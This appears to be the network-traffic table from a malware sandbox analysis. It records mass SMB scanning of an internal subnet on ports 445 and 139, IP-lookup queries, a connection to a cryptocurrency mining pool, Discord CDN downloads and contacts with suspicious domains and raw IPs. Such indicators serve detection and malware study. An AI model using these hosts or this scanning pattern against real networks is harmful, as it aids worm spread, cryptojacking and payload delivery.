| N/A | 10.127.0.205:445 | tcp | |
| N/A | 10.127.0.254:445 | tcp | |
| N/A | 10.127.0.169:445 | tcp | |
| N/A | 10.127.0.194:445 | tcp | |
| N/A | 10.127.0.207:445 | tcp | |
| N/A | 10.127.0.183:445 | tcp | |
| N/A | 10.127.0.198:445 | tcp | |
| N/A | 10.127.0.203:445 | tcp | |
| N/A | 10.127.0.206:445 | tcp | |
| N/A | 10.127.0.202:445 | tcp | |
| N/A | 10.127.0.192:445 | tcp | |
| N/A | 10.127.0.188:445 | tcp | |
| N/A | 10.127.0.196:445 | tcp | |
| N/A | 10.127.0.236:445 | tcp | |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 8.8.8.8:53 | tanie-wino.pila.pl | udp |
| N/A | 10.127.0.215:445 | tcp | |
| N/A | 10.127.0.218:445 | tcp | |
| N/A | 10.127.0.219:445 | tcp | |
| N/A | 10.127.0.195:445 | tcp | |
| N/A | 10.127.0.246:445 | tcp | |
| N/A | 10.127.0.211:445 | tcp | |
| N/A | 10.127.0.209:445 | tcp | |
| N/A | 10.127.0.249:445 | tcp | |
| N/A | 10.127.0.221:445 | tcp | |
| N/A | 10.127.0.230:445 | tcp | |
| N/A | 10.127.0.226:445 | tcp | |
| US | 172.67.74.152:443 | api.ipify.org | tcp |
| N/A | 10.127.0.182:445 | tcp | |
| N/A | 10.127.0.220:445 | tcp | |
| N/A | 10.127.0.222:445 | tcp | |
| N/A | 10.127.0.225:445 | tcp | |
| N/A | 10.127.0.171:445 | tcp | |
| N/A | 10.127.0.213:445 | tcp | |
| N/A | 10.127.0.175:445 | tcp | |
| N/A | 10.127.0.179:445 | tcp | |
| N/A | 10.127.0.238:445 | tcp | |
| N/A | 10.127.0.172:445 | tcp | |
| N/A | 10.127.0.181:445 | tcp | |
| N/A | 10.127.0.210:445 | tcp | |
| N/A | 10.127.0.201:445 | tcp | |
| N/A | 10.127.0.176:445 | tcp | |
| N/A | 10.127.0.244:445 | tcp | |
| N/A | 10.127.0.199:445 | tcp | |
| N/A | 10.127.0.193:445 | tcp | |
| N/A | 10.127.0.177:445 | tcp | |
| N/A | 10.127.0.224:445 | tcp | |
| N/A | 10.127.0.227:445 | tcp | |
| N/A | 10.127.0.178:445 | tcp | |
| N/A | 10.127.0.190:445 | tcp | |
| N/A | 10.127.0.252:445 | tcp | |
| N/A | 10.127.0.170:445 | tcp | |
| N/A | 10.127.0.212:445 | tcp | |
| N/A | 10.127.0.217:445 | tcp | |
| N/A | 10.127.0.216:445 | tcp | |
| N/A | 10.127.0.204:445 | tcp | |
| N/A | 10.127.0.223:445 | tcp | |
| N/A | 10.127.0.180:445 | tcp | |
| N/A | 10.127.0.197:445 | tcp | |
| N/A | 10.127.0.187:445 | tcp | |
| N/A | 10.127.0.184:445 | tcp | |
| N/A | 10.127.0.191:445 | tcp | |
| N/A | 10.127.0.186:445 | tcp | |
| N/A | 10.127.0.200:445 | tcp | |
| N/A | 10.127.0.173:445 | tcp | |
| N/A | 10.127.0.168:445 | tcp | |
| N/A | 10.127.0.189:445 | tcp | |
| N/A | 10.127.0.208:445 | tcp | |
| N/A | 10.127.0.242:445 | tcp | |
| N/A | 10.127.0.253:445 | tcp | |
| N/A | 10.127.0.243:445 | tcp | |
| N/A | 10.127.0.229:445 | tcp | |
| N/A | 10.127.0.239:445 | tcp | |
| N/A | 10.127.0.234:445 | tcp | |
| N/A | 10.127.0.237:445 | tcp | |
| US | 8.8.8.8:53 | 152.74.67.172.in-addr.arpa | udp |
| N/A | 10.127.0.232:445 | tcp | |
| N/A | 10.127.0.231:445 | tcp | |
| N/A | 10.127.0.240:445 | tcp | |
| N/A | 10.127.0.245:445 | tcp | |
| N/A | 10.127.0.247:445 | tcp | |
| N/A | 10.127.0.250:445 | tcp | |
| N/A | 10.127.0.235:445 | tcp | |
| N/A | 10.127.0.248:445 | tcp | |
| N/A | 10.127.0.251:445 | tcp | |
| SE | 171.25.193.9:443 | 171.25.193.9 | tcp |
| US | 8.8.8.8:53 | 9.193.25.171.in-addr.arpa | udp |
| GB | 216.58.204.68:443 | www.google.com | tcp |
| GB | 92.123.128.189:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 189.128.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 172.67.139.220:443 | api.2ip.ua | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | securebiz.org | udp |
| US | 8.8.8.8:53 | tbpws.top | udp |
| DE | 92.246.89.93:80 | tbpws.top | tcp |
| DE | 92.246.89.93:80 | tbpws.top | tcp |
| N/A | 10.127.0.5:445 | tcp | |
| N/A | 10.127.0.8:445 | tcp | |
| N/A | 10.127.0.7:445 | tcp | |
| N/A | 10.127.0.6:445 | tcp | |
| N/A | 10.127.0.0:445 | tcp | |
| N/A | 10.127.0.9:445 | tcp | |
| N/A | 10.127.0.10:445 | tcp | |
| N/A | 10.127.0.11:445 | tcp | |
| N/A | 10.127.0.12:445 | tcp | |
| N/A | 10.127.0.13:445 | tcp | |
| N/A | 10.127.0.14:445 | tcp | |
| N/A | 10.127.0.15:445 | tcp | |
| N/A | 10.127.0.16:445 | tcp | |
| N/A | 10.127.0.17:445 | tcp | |
| N/A | 10.127.0.4:445 | tcp | |
| N/A | 10.127.0.18:445 | tcp | |
| N/A | 10.127.0.2:445 | tcp | |
| N/A | 10.127.0.3:445 | tcp | |
| N/A | 10.127.0.1:445 | tcp | |
| N/A | 10.127.0.19:445 | tcp | |
| N/A | 10.127.0.20:445 | tcp | |
| N/A | 10.127.0.21:445 | tcp | |
| N/A | 10.127.0.22:445 | tcp | |
| N/A | 10.127.0.23:445 | tcp | |
| N/A | 10.127.0.24:445 | tcp | |
| N/A | 10.127.0.25:445 | tcp | |
| N/A | 10.127.0.26:445 | tcp | |
| N/A | 10.127.0.27:445 | tcp | |
| N/A | 10.127.0.28:445 | tcp | |
| N/A | 10.127.0.29:445 | tcp | |
| N/A | 10.127.0.30:445 | tcp | |
| N/A | 10.127.0.31:445 | tcp | |
| N/A | 10.127.0.32:445 | tcp | |
| N/A | 10.127.0.33:445 | tcp | |
| N/A | 10.127.0.34:445 | tcp | |
| N/A | 10.127.0.35:445 | tcp | |
| N/A | 10.127.0.36:445 | tcp | |
| N/A | 10.127.0.37:445 | tcp | |
| N/A | 10.127.0.38:445 | tcp | |
| N/A | 10.127.0.39:445 | tcp | |
| N/A | 10.127.0.40:445 | tcp | |
| N/A | 10.127.0.41:445 | tcp | |
| N/A | 10.127.0.42:445 | tcp | |
| N/A | 10.127.0.43:445 | tcp | |
| N/A | 10.127.0.44:445 | tcp | |
| N/A | 10.127.0.45:445 | tcp | |
| N/A | 10.127.0.46:445 | tcp | |
| N/A | 10.127.0.47:445 | tcp | |
| N/A | 10.127.0.48:445 | tcp | |
| N/A | 10.127.0.49:445 | tcp | |
| N/A | 10.127.0.50:445 | tcp | |
| N/A | 10.127.0.51:445 | tcp | |
| N/A | 10.127.0.52:445 | tcp | |
| N/A | 10.127.0.53:445 | tcp | |
| N/A | 10.127.0.54:445 | tcp | |
| N/A | 10.127.0.55:445 | tcp | |
| N/A | 10.127.0.56:445 | tcp | |
| N/A | 10.127.0.57:445 | tcp | |
| N/A | 10.127.0.58:445 | tcp | |
| N/A | 10.127.0.59:445 | tcp | |
| N/A | 10.127.0.60:445 | tcp | |
| N/A | 10.127.0.61:445 | tcp | |
| N/A | 10.127.0.62:445 | tcp | |
| N/A | 10.127.0.63:445 | tcp | |
| N/A | 10.127.0.64:445 | tcp | |
| N/A | 10.127.0.65:445 | tcp | |
| N/A | 10.127.0.66:445 | tcp | |
| N/A | 10.127.0.67:445 | tcp | |
| N/A | 10.127.0.68:445 | tcp | |
| N/A | 10.127.0.69:445 | tcp | |
| N/A | 10.127.0.70:445 | tcp | |
| N/A | 10.127.0.71:445 | tcp | |
| N/A | 10.127.0.72:445 | tcp | |
| N/A | 10.127.0.73:445 | tcp | |
| N/A | 10.127.0.74:445 | tcp | |
| N/A | 10.127.0.75:445 | tcp | |
| N/A | 10.127.0.76:445 | tcp | |
| N/A | 10.127.0.77:445 | tcp | |
| N/A | 10.127.0.78:445 | tcp | |
| N/A | 10.127.0.79:445 | tcp | |
| N/A | 10.127.0.80:445 | tcp | |
| N/A | 10.127.0.81:445 | tcp | |
| N/A | 10.127.0.82:445 | tcp | |
| N/A | 10.127.0.83:445 | tcp | |
| N/A | 10.127.0.84:445 | tcp | |
| N/A | 10.127.0.85:445 | tcp | |
| N/A | 10.127.0.87:445 | tcp | |
| N/A | 10.127.0.86:445 | tcp | |
| N/A | 10.127.0.88:445 | tcp | |
| N/A | 10.127.0.89:445 | tcp | |
| N/A | 10.127.0.90:445 | tcp | |
| N/A | 10.127.0.91:445 | tcp | |
| N/A | 10.127.0.92:445 | tcp | |
| N/A | 10.127.0.93:445 | tcp | |
| N/A | 10.127.0.94:445 | tcp | |
| N/A | 10.127.0.95:445 | tcp | |
| N/A | 10.127.0.96:445 | tcp | |
| N/A | 10.127.0.97:445 | tcp | |
| N/A | 10.127.0.98:445 | tcp | |
| N/A | 10.127.0.99:445 | tcp | |
| N/A | 10.127.0.100:445 | tcp | |
| N/A | 10.127.0.101:445 | tcp | |
| N/A | 10.127.0.102:445 | tcp | |
| N/A | 10.127.0.103:445 | tcp | |
| N/A | 10.127.0.104:445 | tcp | |
| N/A | 10.127.0.105:445 | tcp | |
| N/A | 10.127.0.106:445 | tcp | |
| N/A | 10.127.0.107:445 | tcp | |
| N/A | 10.127.0.108:445 | tcp | |
| N/A | 10.127.0.109:445 | tcp | |
| N/A | 10.127.0.110:445 | tcp | |
| N/A | 10.127.0.111:445 | tcp | |
| N/A | 10.127.0.112:445 | tcp | |
| N/A | 10.127.0.113:445 | tcp | |
| N/A | 10.127.0.114:445 | tcp | |
| N/A | 10.127.0.115:445 | tcp | |
| N/A | 10.127.0.116:445 | tcp | |
| N/A | 10.127.0.117:445 | tcp | |
| N/A | 10.127.0.118:445 | tcp | |
| N/A | 10.127.0.119:445 | tcp | |
| N/A | 10.127.0.120:445 | tcp | |
| N/A | 10.127.0.121:445 | tcp | |
| N/A | 10.127.0.122:445 | tcp | |
| N/A | 10.127.0.123:445 | tcp | |
| N/A | 10.127.0.125:445 | tcp | |
| N/A | 10.127.0.124:445 | tcp | |
| N/A | 10.127.0.126:445 | tcp | |
| N/A | 10.127.0.127:445 | tcp | |
| N/A | 10.127.0.128:445 | tcp | |
| N/A | 10.127.0.129:445 | tcp | |
| N/A | 10.127.0.130:445 | tcp | |
| N/A | 10.127.0.131:445 | tcp | |
| N/A | 10.127.0.132:445 | tcp | |
| N/A | 10.127.0.133:445 | tcp | |
| N/A | 10.127.0.134:445 | tcp | |
| N/A | 10.127.0.135:445 | tcp | |
| N/A | 10.127.0.136:445 | tcp | |
| N/A | 10.127.0.137:445 | tcp | |
| N/A | 10.127.0.138:445 | tcp | |
| N/A | 10.127.0.139:445 | tcp | |
| N/A | 10.127.0.140:445 | tcp | |
| N/A | 10.127.0.141:445 | tcp | |
| N/A | 10.127.0.142:445 | tcp | |
| N/A | 10.127.0.143:445 | tcp | |
| N/A | 10.127.0.144:445 | tcp | |
| N/A | 10.127.0.145:445 | tcp | |
| N/A | 10.127.0.146:445 | tcp | |
| N/A | 10.127.0.147:445 | tcp | |
| N/A | 10.127.0.148:445 | tcp | |
| N/A | 10.127.0.149:445 | tcp | |
| N/A | 10.127.0.150:445 | tcp | |
| N/A | 10.127.0.151:445 | tcp | |
| N/A | 10.127.0.152:445 | tcp | |
| N/A | 10.127.0.153:445 | tcp | |
| N/A | 10.127.0.154:445 | tcp | |
| N/A | 10.127.0.155:445 | tcp | |
| N/A | 10.127.0.156:445 | tcp | |
| N/A | 10.127.0.157:445 | tcp | |
| N/A | 10.127.0.158:445 | tcp | |
| N/A | 10.127.0.159:445 | tcp | |
| N/A | 10.127.0.160:445 | tcp | |
| N/A | 10.127.0.161:445 | tcp | |
| N/A | 10.127.0.162:445 | tcp | |
| N/A | 10.127.0.163:445 | tcp | |
| N/A | 10.127.0.164:445 | tcp | |
| N/A | 10.127.0.165:445 | tcp | |
| N/A | 10.127.0.166:445 | tcp | |
| N/A | 10.127.0.167:445 | tcp | |
| N/A | 10.127.0.168:445 | tcp | |
| N/A | 10.127.0.169:445 | tcp | |
| N/A | 10.127.0.170:445 | tcp | |
| N/A | 10.127.0.171:445 | tcp | |
| N/A | 10.127.0.172:445 | tcp | |
| N/A | 10.127.0.174:445 | tcp | |
| N/A | 10.127.0.173:445 | tcp | |
| N/A | 10.127.0.175:445 | tcp | |
| N/A | 10.127.0.176:445 | tcp | |
| N/A | 10.127.0.177:445 | tcp | |
| N/A | 10.127.0.178:445 | tcp | |
| N/A | 10.127.0.179:445 | tcp | |
| N/A | 10.127.0.180:445 | tcp | |
| N/A | 10.127.0.181:445 | tcp | |
| N/A | 10.127.0.182:445 | tcp | |
| N/A | 10.127.0.183:445 | tcp | |
| N/A | 10.127.0.184:445 | tcp | |
| N/A | 10.127.0.185:445 | tcp | |
| N/A | 10.127.0.187:445 | tcp | |
| N/A | 10.127.0.186:445 | tcp | |
| N/A | 10.127.0.188:445 | tcp | |
| N/A | 10.127.0.189:445 | tcp | |
| N/A | 10.127.0.190:445 | tcp | |
| N/A | 10.127.0.191:445 | tcp | |
| N/A | 10.127.0.192:445 | tcp | |
| N/A | 10.127.0.193:445 | tcp | |
| N/A | 10.127.0.194:445 | tcp | |
| N/A | 10.127.0.196:445 | tcp | |
| N/A | 10.127.0.195:445 | tcp | |
| N/A | 10.127.0.197:445 | tcp | |
| N/A | 10.127.0.198:445 | tcp | |
| N/A | 10.127.0.199:445 | tcp | |
| N/A | 10.127.0.200:445 | tcp | |
| N/A | 10.127.0.201:445 | tcp | |
| N/A | 10.127.0.202:445 | tcp | |
| N/A | 10.127.0.203:445 | tcp | |
| N/A | 10.127.0.204:445 | tcp | |
| N/A | 10.127.0.205:445 | tcp | |
| N/A | 10.127.0.206:445 | tcp | |
| N/A | 10.127.0.207:445 | tcp | |
| N/A | 10.127.0.208:445 | tcp | |
| N/A | 10.127.0.209:445 | tcp | |
| N/A | 10.127.0.210:445 | tcp | |
| N/A | 10.127.0.211:445 | tcp | |
| N/A | 10.127.0.212:445 | tcp | |
| N/A | 10.127.0.214:445 | tcp | |
| N/A | 10.127.0.213:445 | tcp | |
| N/A | 10.127.0.215:445 | tcp | |
| N/A | 10.127.0.216:445 | tcp | |
| N/A | 10.127.0.217:445 | tcp | |
| N/A | 10.127.0.218:445 | tcp | |
| N/A | 10.127.0.219:445 | tcp | |
| N/A | 10.127.0.220:445 | tcp | |
| N/A | 10.127.0.221:445 | tcp | |
| N/A | 10.127.0.222:445 | tcp | |
| N/A | 10.127.0.223:445 | tcp | |
| N/A | 10.127.0.224:445 | tcp | |
| N/A | 10.127.0.225:445 | tcp | |
| N/A | 10.127.0.226:445 | tcp | |
| N/A | 10.127.0.227:445 | tcp | |
| N/A | 10.127.0.228:445 | tcp | |
| N/A | 10.127.0.229:445 | tcp | |
| N/A | 10.127.0.230:445 | tcp | |
| N/A | 10.127.0.231:445 | tcp | |
| N/A | 10.127.0.232:445 | tcp | |
| N/A | 10.127.0.234:445 | tcp | |
| N/A | 10.127.0.233:445 | tcp | |
| N/A | 10.127.0.235:445 | tcp | |
| N/A | 10.127.0.236:445 | tcp | |
| N/A | 10.127.0.238:445 | tcp | |
| N/A | 10.127.0.237:445 | tcp | |
| N/A | 10.127.0.239:445 | tcp | |
| N/A | 10.127.0.240:445 | tcp | |
| N/A | 10.127.0.242:445 | tcp | |
| N/A | 10.127.0.243:445 | tcp | |
| N/A | 10.127.0.244:445 | tcp | |
| N/A | 10.127.0.246:445 | tcp | |
| N/A | 10.127.0.245:445 | tcp | |
| N/A | 10.127.0.247:445 | tcp | |
| N/A | 10.127.0.248:445 | tcp | |
| N/A | 10.127.0.249:445 | tcp | |
| N/A | 10.127.0.251:445 | tcp | |
| N/A | 10.127.0.250:445 | tcp | |
| N/A | 10.127.0.252:445 | tcp | |
| N/A | 10.127.0.253:445 | tcp | |
| N/A | 10.127.0.254:445 | tcp | |
| FI | 37.27.61.180:445 | tcp | |
| US | 8.8.8.8:53 | arthuretpaul.com | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| N/A | 10.127.0.17:139 | tcp | |
| N/A | 10.127.0.4:139 | tcp | |
| N/A | 10.127.0.3:139 | tcp | |
| N/A | 10.127.0.2:139 | tcp | |
| N/A | 10.127.0.18:139 | tcp | |
| N/A | 10.127.0.1:139 | tcp | |
| N/A | 10.127.0.5:139 | tcp | |
| N/A | 10.127.0.8:139 | tcp | |
| N/A | 10.127.0.7:139 | tcp | |
| N/A | 10.127.0.6:139 | tcp | |
| N/A | 10.127.0.0:139 | tcp | |
| N/A | 10.127.0.9:139 | tcp | |
| N/A | 10.127.0.10:139 | tcp | |
| N/A | 10.127.0.12:139 | tcp | |
| N/A | 10.127.0.11:139 | tcp | |
| N/A | 10.127.0.13:139 | tcp | |
| N/A | 10.127.0.14:139 | tcp | |
| N/A | 10.127.0.15:139 | tcp | |
| N/A | 10.127.0.16:139 | tcp | |
| N/A | 10.127.0.19:139 | tcp | |
| N/A | 10.127.0.20:139 | tcp | |
| N/A | 10.127.0.21:139 | tcp | |
| N/A | 10.127.0.24:139 | tcp | |
| N/A | 10.127.0.22:139 | tcp | |
| N/A | 10.127.0.23:139 | tcp | |
| N/A | 10.127.0.25:139 | tcp | |
| N/A | 10.127.0.27:139 | tcp | |
| N/A | 10.127.0.26:139 | tcp | |
| N/A | 10.127.0.28:139 | tcp | |
| N/A | 10.127.0.29:139 | tcp | |
| N/A | 10.127.0.30:139 | tcp | |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 10.127.0.31:139 | tcp | |
| N/A | 10.127.0.32:139 | tcp | |
| N/A | 10.127.0.33:139 | tcp | |
| N/A | 10.127.0.34:139 | tcp | |
| N/A | 10.127.0.35:139 | tcp | |
| N/A | 10.127.0.36:139 | tcp | |
| N/A | 10.127.0.37:139 | tcp | |
| N/A | 10.127.0.38:139 | tcp | |
| N/A | 10.127.0.40:139 | tcp | |
| N/A | 10.127.0.46:139 | tcp | |
| N/A | 10.127.0.41:139 | tcp | |
| N/A | 10.127.0.39:139 | tcp | |
| N/A | 10.127.0.42:139 | tcp | |
| N/A | 10.127.0.43:139 | tcp | |
| N/A | 10.127.0.45:139 | tcp | |
| N/A | 10.127.0.44:139 | tcp | |
| N/A | 10.127.0.48:139 | tcp | |
| N/A | 10.127.0.47:139 | tcp | |
| N/A | 10.127.0.49:139 | tcp | |
| N/A | 10.127.0.50:139 | tcp | |
| N/A | 10.127.0.51:139 | tcp | |
| N/A | 10.127.0.52:139 | tcp | |
| N/A | 10.127.0.53:139 | tcp | |
| N/A | 10.127.0.59:139 | tcp | |
| N/A | 10.127.0.61:139 | tcp | |
| N/A | 10.127.0.60:139 | tcp | |
| N/A | 10.127.0.62:139 | tcp | |
| N/A | 10.127.0.63:139 | tcp | |
| N/A | 10.127.0.66:139 | tcp | |
| N/A | 10.127.0.64:139 | tcp | |
| N/A | 10.127.0.65:139 | tcp | |
| N/A | 10.127.0.55:139 | tcp | |
| N/A | 10.127.0.54:139 | tcp | |
| N/A | 10.127.0.56:139 | tcp | |
| N/A | 10.127.0.57:139 | tcp | |
| N/A | 10.127.0.58:139 | tcp | |
| N/A | 10.127.0.67:139 | tcp | |
| N/A | 10.127.0.68:139 | tcp | |
| N/A | 10.127.0.69:139 | tcp | |
| N/A | 10.127.0.70:139 | tcp | |
| N/A | 10.127.0.72:139 | tcp | |
| N/A | 10.127.0.71:139 | tcp | |
| N/A | 10.127.0.73:139 | tcp | |
| N/A | 10.127.0.74:139 | tcp | |
| N/A | 10.127.0.75:139 | tcp | |
| N/A | 10.127.0.78:139 | tcp | |
| N/A | 10.127.0.76:139 | tcp | |
| N/A | 10.127.0.77:139 | tcp | |
| N/A | 10.127.0.79:139 | tcp | |
| N/A | 10.127.0.82:139 | tcp | |
| N/A | 10.127.0.81:139 | tcp | |
| N/A | 10.127.0.80:139 | tcp | |
| N/A | 10.127.0.83:139 | tcp | |
| N/A | 10.127.0.84:139 | tcp | |
| N/A | 10.127.0.85:139 | tcp | |
| N/A | 10.127.0.114:139 | tcp | |
| N/A | 10.127.0.115:139 | tcp | |
| N/A | 10.127.0.116:139 | tcp | |
| N/A | 10.127.0.113:139 | tcp | |
| N/A | 10.127.0.117:139 | tcp | |
| N/A | 10.127.0.118:139 | tcp | |
| N/A | 10.127.0.119:139 | tcp | |
| N/A | 10.127.0.120:139 | tcp | |
| N/A | 10.127.0.121:139 | tcp | |
| N/A | 10.127.0.122:139 | tcp | |
| N/A | 10.127.0.123:139 | tcp | |
| N/A | 10.127.0.87:139 | tcp | |
| N/A | 10.127.0.86:139 | tcp | |
| N/A | 10.127.0.88:139 | tcp | |
| N/A | 10.127.0.89:139 | tcp | |
| N/A | 10.127.0.90:139 | tcp | |
| N/A | 10.127.0.91:139 | tcp | |
| N/A | 10.127.0.92:139 | tcp | |
| N/A | 10.127.0.93:139 | tcp | |
| N/A | 10.127.0.94:139 | tcp | |
| N/A | 10.127.0.95:139 | tcp | |
| N/A | 10.127.0.96:139 | tcp | |
| N/A | 10.127.0.97:139 | tcp | |
| N/A | 10.127.0.98:139 | tcp | |
| N/A | 10.127.0.99:139 | tcp | |
| N/A | 10.127.0.100:139 | tcp | |
| N/A | 10.127.0.101:139 | tcp | |
| N/A | 10.127.0.102:139 | tcp | |
| N/A | 10.127.0.103:139 | tcp | |
| N/A | 10.127.0.104:139 | tcp | |
| N/A | 10.127.0.105:139 | tcp | |
| N/A | 10.127.0.106:139 | tcp | |
| N/A | 10.127.0.107:139 | tcp | |
| N/A | 10.127.0.108:139 | tcp | |
| N/A | 10.127.0.109:139 | tcp | |
| N/A | 10.127.0.110:139 | tcp | |
| N/A | 10.127.0.112:139 | tcp | |
| N/A | 10.127.0.111:139 | tcp | |
| N/A | 10.127.0.124:139 | tcp | |
| N/A | 10.127.0.125:139 | tcp | |
| N/A | 10.127.0.126:139 | tcp | |
| N/A | 10.127.0.127:139 | tcp | |
| N/A | 10.127.0.128:139 | tcp | |
| N/A | 10.127.0.131:139 | tcp | |
| N/A | 10.127.0.130:139 | tcp | |
| N/A | 10.127.0.129:139 | tcp | |
| N/A | 10.127.0.132:139 | tcp | |
| N/A | 10.127.0.133:139 | tcp | |
| N/A | 10.127.0.134:139 | tcp | |
| N/A | 10.127.0.137:139 | tcp | |
| N/A | 10.127.0.135:139 | tcp | |
| N/A | 10.127.0.136:139 | tcp | |
| N/A | 10.127.0.139:139 | tcp | |
| N/A | 10.127.0.138:139 | tcp | |
| N/A | 10.127.0.140:139 | tcp | |
| N/A | 10.127.0.141:139 | tcp | |
| N/A | 10.127.0.142:139 | tcp | |
| N/A | 10.127.0.147:139 | tcp | |
| N/A | 10.127.0.146:139 | tcp | |
| N/A | 10.127.0.144:139 | tcp | |
| N/A | 10.127.0.143:139 | tcp | |
| N/A | 10.127.0.145:139 | tcp | |
| N/A | 10.127.0.150:139 | tcp | |
| N/A | 10.127.0.151:139 | tcp | |
| N/A | 10.127.0.153:139 | tcp | |
| N/A | 10.127.0.152:139 | tcp | |
| N/A | 10.127.0.154:139 | tcp | |
| N/A | 10.127.0.155:139 | tcp | |
| N/A | 10.127.0.156:139 | tcp | |
| N/A | 10.127.0.157:139 | tcp | |
| N/A | 10.127.0.158:139 | tcp | |
| N/A | 10.127.0.159:139 | tcp | |
| N/A | 10.127.0.160:139 | tcp | |
| N/A | 10.127.0.161:139 | tcp | |
| N/A | 10.127.0.163:139 | tcp | |
| N/A | 10.127.0.162:139 | tcp | |
| N/A | 10.127.0.165:139 | tcp | |
| N/A | 10.127.0.164:139 | tcp | |
| N/A | 10.127.0.166:139 | tcp | |
| N/A | 10.127.0.167:139 | tcp | |
| N/A | 10.127.0.168:139 | tcp | |
| N/A | 10.127.0.169:139 | tcp | |
| N/A | 10.127.0.170:139 | tcp | |
| N/A | 10.127.0.171:139 | tcp | |
| N/A | 10.127.0.172:139 | tcp | |
| N/A | 10.127.0.174:139 | tcp | |
| N/A | 10.127.0.173:139 | tcp | |
| N/A | 10.127.0.175:139 | tcp | |
| N/A | 10.127.0.177:139 | tcp | |
| N/A | 10.127.0.176:139 | tcp | |
| N/A | 10.127.0.178:139 | tcp | |
| N/A | 10.127.0.179:139 | tcp | |
| N/A | 10.127.0.181:139 | tcp | |
| N/A | 10.127.0.180:139 | tcp | |
| N/A | 10.127.0.182:139 | tcp | |
| N/A | 10.127.0.183:139 | tcp | |
| N/A | 10.127.0.184:139 | tcp | |
| N/A | 10.127.0.185:139 | tcp | |
| N/A | 10.127.0.187:139 | tcp | |
| N/A | 10.127.0.186:139 | tcp | |
| N/A | 10.127.0.188:139 | tcp | |
| N/A | 10.127.0.189:139 | tcp | |
| N/A | 10.127.0.190:139 | tcp | |
| N/A | 10.127.0.191:139 | tcp | |
| N/A | 10.127.0.192:139 | tcp | |
| N/A | 10.127.0.194:139 | tcp | |
| N/A | 10.127.0.193:139 | tcp | |
| N/A | 10.127.0.195:139 | tcp | |
| N/A | 10.127.0.196:139 | tcp | |
| N/A | 10.127.0.197:139 | tcp | |
| N/A | 10.127.0.198:139 | tcp | |
| N/A | 10.127.0.199:139 | tcp | |
| N/A | 10.127.0.201:139 | tcp | |
| N/A | 10.127.0.200:139 | tcp | |
| N/A | 10.127.0.202:139 | tcp | |
| N/A | 10.127.0.203:139 | tcp | |
| N/A | 10.127.0.204:139 | tcp | |
| N/A | 10.127.0.205:139 | tcp | |
| N/A | 10.127.0.206:139 | tcp | |
| N/A | 10.127.0.207:139 | tcp | |
| N/A | 10.127.0.208:139 | tcp | |
| N/A | 10.127.0.209:139 | tcp | |
| N/A | 10.127.0.149:139 | tcp | |
| N/A | 10.127.0.148:139 | tcp | |
| N/A | 10.127.0.212:139 | tcp | |
| N/A | 10.127.0.210:139 | tcp | |
| N/A | 10.127.0.211:139 | tcp | |
| N/A | 10.127.0.213:139 | tcp | |
| N/A | 10.127.0.214:139 | tcp | |
| N/A | 10.127.0.215:139 | tcp | |
| N/A | 10.127.0.216:139 | tcp | |
| N/A | 10.127.0.217:139 | tcp | |
| N/A | 10.127.0.218:139 | tcp | |
| N/A | 10.127.0.219:139 | tcp | |
| N/A | 10.127.0.220:139 | tcp | |
| N/A | 10.127.0.221:139 | tcp | |
| N/A | 10.127.0.222:139 | tcp | |
| N/A | 10.127.0.223:139 | tcp | |
| N/A | 10.127.0.224:139 | tcp | |
| N/A | 10.127.0.225:139 | tcp | |
| N/A | 10.127.0.226:139 | tcp | |
| N/A | 10.127.0.228:139 | tcp | |
| N/A | 10.127.0.229:139 | tcp | |
| N/A | 10.127.0.227:139 | tcp | |
| N/A | 10.127.0.230:139 | tcp | |
| N/A | 10.127.0.231:139 | tcp | |
| N/A | 10.127.0.234:139 | tcp | |
| N/A | 10.127.0.232:139 | tcp | |
| N/A | 10.127.0.233:139 | tcp | |
| N/A | 10.127.0.236:139 | tcp | |
| N/A | 10.127.0.235:139 | tcp | |
| N/A | 10.127.0.238:139 | tcp | |
| N/A | 10.127.0.239:139 | tcp | |
| N/A | 10.127.0.237:139 | tcp | |
| N/A | 10.127.0.240:139 | tcp | |
| N/A | 10.127.0.242:139 | tcp | |
| N/A | 10.127.0.243:139 | tcp | |
| N/A | 10.127.0.244:139 | tcp | |
| N/A | 10.127.0.246:139 | tcp | |
| N/A | 10.127.0.245:139 | tcp | |
| N/A | 10.127.0.247:139 | tcp | |
| N/A | 10.127.0.248:139 | tcp | |
| N/A | 10.127.0.249:139 | tcp | |
| N/A | 10.127.0.251:139 | tcp | |
| N/A | 10.127.0.250:139 | tcp | |
| N/A | 10.127.0.253:139 | tcp | |
| N/A | 10.127.0.254:139 | tcp | |
| FI | 37.27.61.180:139 | tcp | |
| N/A | 10.127.0.252:139 | tcp | |
| US | 8.8.8.8:53 | 233.134.159.162.in-addr.arpa | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| LV | 195.123.212.113:1357 | tcp | |
| DE | 193.23.244.244:80 | 193.23.244.244 | tcp |
| US | 8.8.8.8:53 | videozbuzz.altervista.org | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 216.218.219.41:80 | 216.218.219.41 | tcp |
| US | 8.8.8.8:53 | 113.212.123.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 244.244.23.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.219.218.216.in-addr.arpa | udp |
| N/A | 127.0.0.1:8989 | tcp | |
| US | 216.218.219.41:80 | 216.218.219.41 | tcp |
| N/A | 10.127.255.2:445 | tcp | |
| N/A | 10.127.255.21:445 | tcp | |
| N/A | 10.127.255.4:445 | tcp | |
| N/A | 10.127.255.10:445 | tcp | |
| N/A | 10.127.255.30:445 | tcp | |
| N/A | 10.127.255.47:445 | tcp | |
| N/A | 10.127.255.28:445 | tcp | |
| N/A | 10.127.255.37:445 | tcp | |
| N/A | 10.127.255.64:445 | tcp | |
| N/A | 10.127.255.52:445 | tcp | |
| N/A | 10.127.255.18:445 | tcp | |
| N/A | 10.127.255.51:445 | tcp | |
| N/A | 10.127.255.160:445 | tcp | |
| N/A | 10.127.255.33:445 | tcp | |
| N/A | 10.127.255.12:445 | tcp | |
| N/A | 10.127.255.16:445 | tcp | |
| N/A | 10.127.255.56:445 | tcp | |
| N/A | 10.127.255.42:445 | tcp | |
